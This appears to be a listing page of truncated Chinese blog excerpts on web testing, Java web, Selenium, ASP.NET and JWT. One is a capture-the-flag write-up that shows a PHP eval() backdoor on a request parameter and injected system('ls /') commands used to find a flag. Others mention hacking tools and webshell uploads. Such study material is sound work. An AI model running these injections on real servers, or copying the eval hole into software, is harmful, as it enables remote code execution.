Day 23 禁用CSS  Disable CSS 为什么 ? CSS,层叠样式表,是用来定义web页面布局和显示的机制.通过修改CSS样式,可以改变整个页面的外观. 但是有一些人,因为之前的选择或者其他原因,或选择禁用浏览器的CSS.这样可以使得站点看起来更加简单,最终也有利于屏幕阅读功能访问这些页面. 因此,在css禁用场景下的测试还是很重要的.如果禁用了CSS,你会惊讶的发现站点的流程和顺序都会有改变. 怎么做 ? 我发现的最简单的测试方法就是,用装有web开发工具插件的Firefox来打…

[前言]最近负责的一次迭代发布中,一个小需求涉及前端JS改动,在测试这个需求的过程中忽略了浏览器兼容性测试,导致了一个线上bug.恶补下web测试,<36Days of web testing>是之前看到有人推荐的,翻了翻,觉得挺不错的,决定利用业余时间把它翻译完,希望自己能坚持住,保证每周更新. Day1: Cross Browser - 跨浏览器兼容性测试 为什么要做有浏览器兼容性测试? 如今,市面上的浏览器种类越来越多(尤其是在平板和移动设备上),这就意味着你所测试的站点需要在这些你声称…

Day 14: Automate the tedious Why ? 有些时候,web测试还是蛮单调乏味的,在开始测试前,你可能要必须跳转到一个特定的表单页面,或则为了得到一个特定的页面(或配置),你必须准备很多数据. 这种场景下,我发现通过selenium IDE进行UI测试的录制.回放,通过一些简单的SQL脚本来造数据,可以使测试准备工作特别有高效. 通过这些工具,可以很简单.快速的,来到你想测试的点(test point) PS:这个感同身受啊,举个实际工作中的例子,比如我要测试退款业务(…

Day 7: Http 和 Https Why? 当在网络上传输一些私人,敏感信息时,应该采用加密的手段来保证这些信息在传输的过程中不被侦测到.Https协议正是这种实现机制. Https是一种广泛使用的安全通信协议,下面是维基百科对它的定义: 超文本传输安全协议(缩写:HTTPS,英语:Hypertext Transfer Protocol Secure)是超文本传输协议和SSL/TLS的组合,用以提供加密通讯及对网络服务器身份的鉴定.HTTPS连接经常被用于万维网上的交易支付和企业信息系统中…

Day 30 Test in situ  真实场景下的测试 为什么? 我十分推崇现场测试,简单讲就是要在你的站点或应用真实使用的场景下进行测试.但随着人口增长,对于"真实场景"的定义变得愈发困难,因为人们可能在各种场景下使用产品. 如果你正在测试一个公共报亭软件,在拥挤,嘈杂,光线刺眼的公共环境,是否可以如预期的工作?在测试环境可能正常工作,但在户外街道上测试,和在测试环境的结果一样吗?你的移动APP在公交站点,深夜,下雨的时候都可以正常工作吗? 怎么做? 试着定义一些常见的"…

Day 19: UX  用户体验 Why ? 最近UX变得越来越火,用户提现往往会直接联想到易用性和设计. 在我看来,UX不仅仅是这两点.UX, User Experience ,对我而言,不单单是产品,还应该包含客服.发布说明.文档.技术支持文档/站点/手册,性能,安全,易用性,可用性,可及性,适用性等.这个很大的话题. How? 作为一名测试工程师,对于UX,好像我们可做的事情不是很多.下面列出的这些关于UX的点,可能并不适用于你的产品,但是在你测试的过程中,考虑下这些方面,也没坏处对吧.…

C#实现多级子目录Zip压缩解压实例 参考 https://blog.csdn.net/lki_suidongdong/article/details/20942977 重点: 实现多级子目录的压缩,类似winrar,可以选择是否排除基准目录 1 public void ZipDirectoryTest() 2 { 3 string path = System.IO.Path.Combine(System.IO.Path.GetTempPath(), DateTime.Now.Ticks.ToS…

How to choose between zombie.js and PhantomJS for automated web testing? [closed] How to choose between zombie.js and PhantomJS for automated web testing? [closed]…

在上一篇,介绍一下渐进式 Web App(离线) - Part 1的文章中,我们讨论了典型的pwa应该是什么样子的并且同时也介绍了 server worker.到目前为止,我们已经缓存了应用壳.在 index.html和latet.html页面中,我们的应用已经实现了离线加载缓存数据.在重复访问时,它们的加载速度更快.在本教程第一部分的结尾,我们能够离线加载latest.html,但在用户离线时无法显示获得动态数据.这次学习我们将: 当用户离线时候显示在latest页面缓存 app的数据 利用l…

web testing cypress https://www.cypress.io/ https://github.com/cypress-io/cypress https://docs.cypress.io/guides/getting-started/installing-cypress.html#System-requirements video <video width="400" height="300" controls src="ht…

一.Servlet简介 Servlet是sun公司提供的一门用于开发动态web资源的技术. Sun公司在其API中提供了一个servlet接口,用户若想用发一个动态web资源(即开发一个Java程序向浏览器输出数据),需要完成以下2个步骤: 1.编写一个Java类,实现servlet接口. 2.把开发好的Java类部署到web服务器中. 按照一种约定俗成的称呼习惯,通常我们也把实现了servlet接口的java程序,称之为Servlet 二.Servlet的运行过程 Servlet程序是由WEB…

在网上看见一篇不错的文章,写的详细. 以下内容引用那篇博文.转载于<http://www.cnblogs.com/whgk/p/6427759.html>,在此仅供学习参考之用. 一.JSP 1.什么是JSP? JSP(Java Server Pages):是以Java语言为基础的动态网页开发技术, 特点: Servlet特点:在Java源码中嵌入html源码 JSP特点:在html源码中嵌入java代码 JSP就是Servlet 1.tomcat获得JSP文件后,先将JSP转成servlet…

学习内容 Ø        XHTML 的发展历程 Ø        XHTML 和 HTML 的区别 Ø        XHTML的DOCTYPE和基本标签 Ø        CSS 常用属性 能力目标 Ø        熟练掌握XHTML 和 HTML 的区别 Ø        理解XHTML的DOCTYPE Ø        掌握创建简单的XHTML页面布局 本章简介 在上一阶段我们全面地学习了客户端页面技术的实现--HTML,内容包括:HTML 基本标签.表单和框架的使用.模板的制作和应…

Web 应用框架,或者简单的说是“Web 框架”,其实是建立 web 应用的一种方式.从简单的博客系统到复杂的富 AJAX 应用,web 上每个页面都是通过写代码来生成的.我发现很多人都热衷于学习 web 框架技术,例如 Flask 或这 Django 之类的,但是很多人并不理解什么是 web 框架,或者它们是如何工作的.这篇文章中,我将探索反复被忽略的 web 框架基础的话题.阅读完这篇文章,你应该首先对什么是 web 框架以及它们为什么会存在有更深的认识.这会让你学习一个新的 web 框架变…

最近折腾HTML5游戏需要离线存储功能,便把目前可用的几种HTML5存储方式研究了下,基于HT for Web写了个综合的实例,分别利用了Cookie.WebStorage.IndexedDB以及FileSystem四种本地离线存储方式,对燃气监控系统的表计位置.朝向.开关以及表值等信息做了CURD的存取操作. HTML5的存储还有一种Web SQL Database方式,虽然还有浏览器支持,是唯一的关系数据库结构的存储,但W3C以及停止对其的维护和发展,所以这里我们也不再对其进行介绍:Bewa…

万维网(Web)服务的客户端浏览程序.可向万维网(Web)服务器发送各种请求,并对从服务器发来的超文本信息和各种 多媒体数据格式进行解释.显示和播放--------百度百科对浏览器给出这样的解释.…

大多数现代web应用都使用了AJAX技术.当浏览器加载一个页面的时候,该页面内的元素可能在不用的时间间隔内进行加载.这使得元素定位变得比较困难:如果一个元素还没有出现在DOM中,定位函数将会抛出一个ElementNotVisibleException异常.使用waits等待可以解决这个问题.等待将会给定位一个元素或者对元素进行一些其他的操作提供一个缓冲的时间. Selenium WebDriver提供了两种类型的等待--显式等待和隐式等待.显式等待会给WebDriver一个确定的条件,如果条件满…

在 Asp.Net Web Api 中提供了两种 媒体类型格式化器(mime-type formatter),分别用于支持 JSON 和 XML 数据的格式化处理.默认两种格式化器已集成到了 Asp.Net Web Api 的请求处理管道(pipline) 中,客户端可以在请求报文头中通过设置 Accept 参数来指定获取数据的格式类型(JSON或 XML). 媒体类型格式化器 是指具有如下功能的类型: 从 Http 消息中读取 CLR 对象 将 CLR 对象写入到Http 消息中 JSon 格…

本文讲讲mvc的异常处理机制,方便查阅以及编写合理的异常响应方式 入口例子 很简单,根据之前的文章,我们只需要复写WebMvcConfigurer接口的异常添加方法即可,如下 1.创建简单的异常处理类,本例针对绑定异常 package com.example.demo.web.validation; import com.example.demo.web.model.ResEntity; import com.google.gson.Gson; import org.slf4j.Logger;…

[译]ASP.NET Core Web API 中使用Oracle数据库和Dapper看这篇就够了 本文首发自:博客园 文章地址: https://www.cnblogs.com/yilezhu/p/9276565.html 园子里关于ASP.NET Core Web API的教程很多,但大多都是使用EF+Mysql或者EF+MSSQL的文章.甚至关于ASP.NET Core Web API中使用Dapper+Mysql组合的文章都很少,更别提Oracel+Dapper组合的文章了,那么今天就带…

大家好,这里是「 从零开始学 Web 系列教程 」,并在下列地址同步更新...... github:https://github.com/Daotin/Web 微信公众号:Web前端之巅 博客园:http://www.cnblogs.com/lvonve/ CSDN:https://blog.csdn.net/lvonve/ 在这里我会从 Web 前端零基础开始,一步步学习 Web 相关的知识点,期间也会分享一些好玩的项目.现在就让我们一起进入 Web 前端学习的探索之旅吧! 一.touch事件…

这些工具都有助于发现漏洞,从而最大限度地提高测试人员的时间和效率.这些工具,2019年更新,也可用于寻找漏洞. 为何扫描? 这资源是什么? Web应用程序对黑客具有极大的吸引力,并且出于百万种不同的原因,尤其是因为当它们管理不当和未修补时,它们突然变得非常容易攻击.我们在这个资源中所做的就是列出一堆能够渗透并点击网站的Web应用程序黑客软件(例如).按优先顺序,我们注意到这些是当今最流行的内容管理系统. WordPress 28.6% Joomla 3.3% Drupal 2.3% Magnet…

P164  例5-1  常用SQL语句 P178  数据库连接池 (1)连接池的作用 存储多个数据库连接对象,当程序需要时,从池中获取1个连接,程序执行完成后再还给连接池.避免数据库连接建立.关闭的开销.提高数据库访问速度. (2)在Tomcat中使用连接池的步骤 1.Tomcat目录下config\context.xml,在标签<context>中加入以下内容: <Resource name = "jdbc/xxx" auth = "Container&q…

主要是使用 OAuth 时,它运行在 OWIN 上,然后又出了若干问题,总之,发现对 IIS.ASP.NET 和 OWIN 理解一塌糊涂. 后面看到 OWIN: Open Web Server Interface for .NET 这篇博客,感觉有意思(主要下它的思想很好),想与你们分享下. 英语之前不好,现在还不好,难过.我先假定我英语和原文中的技术都精通,翻译好后放在博客上,也难免不会有不对的地方需要修改, 这个时候如何方便修改是个问题?于是我在 git 上建了个项目,项目地址:https:…

JWT 入门指南 原文地址:https://blog.angular-university.io/angular-jwt/ 这篇文章是两篇手把手教你如何在Angular应用(也适用于企业级应用)中实现基于JWT的认证方式的文章中的第一篇. 本篇文章的首要目标是详细学习JWTs如何运行,包括它在web应用中怎么用来做用户认证和session管理的. 第二篇文章中,我们会介绍基于JWT的认证系统是在特定的Angular应用中可以如何实现,但是这篇文章仅仅是介绍JWTs. 为什么要深入了解JWT 全面…

介绍     现在我们已经有了基础的框架了,是时候添加内容了,那么我们首先应该考虑的就是在应用程序中添加日志功能.我们会使用Windsor来配置,在这一部分,你将学习Windsor之外的其他功能. Logging Facility     在上一部分说过,Windsor有很多自带的可选的功能组件,他们扩展了Windsor的即用性.在这一部分,我们将在程序中添加日志功能.     Logging Facility提供了一些常用的日志框架比如Log4net.Nlog,以及mvc内置的日志框架Trac…

一.selenium的三种等待 当执行python的selenium代码时,如果需要定位一个元素或者点击一个元素,需要考虑到网速等多方面原因,导致页面加载速度慢,元素还未加载出来,这样就会导致找不到对应元素,从而报错的问题,所以要设置等待条件,等待元素加载出来后才执行相应的代码. 其中,selenium中有三种等待方式,下面一一进行介绍. 1.强制等待 最简单的一种方式,直接引入time模块,设置等待时间,但这种方式实用性不高,设置时间太短元素仍未找到,设置时间过长影响效率. import ti…

eval执行: 1.进入网页,显示源码, <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 2.输入命令,发现该文件并不是想要的, cmd=system("ls"); 3.继续查看目录命令, cmd=system("ls /"); 4.查看,得到flag, cmd=system(&qu…

    常规WEB渗透测试漏洞描述及修复 --转自:http://www.51testing.com/html/92/n-3723692.html (1). Apache样例文件泄漏 漏洞描述 apache一些样例文件没有删除,可能存在cookie.session伪造,进行后台登录操作 修复建议 1.删除样例文件 2.对apache中web.xml进行相关设置 (2)弱口令 漏洞描述 由于系统中存在有弱口令,导致攻击者通过弱口令可轻松登录系统中,从而进行下一步的攻击,如上传webshell,获取…

Asp.Net Web API 2 官网菜鸟学习系列导航[持续更新中]   前言 本来一直参见于微软官网进行学习的, 官网网址http://www.asp.net/web-api.出于自己想锻炼一下学习阅读英文文章的目的,又可以学习下微软新发布的技术,其实也很久了,但自己菜鸟一枚,对自己来说都是新技术了.鉴于以上两个原因,本人打算借助google翻译和有道词典,来翻译学习这个系列,并通过博客园来记录自己的翻译学习过程.由于自己阅读水平的确太菜,在借助工具的情况下,有时候搞出来的也是蹩脚的语句,自…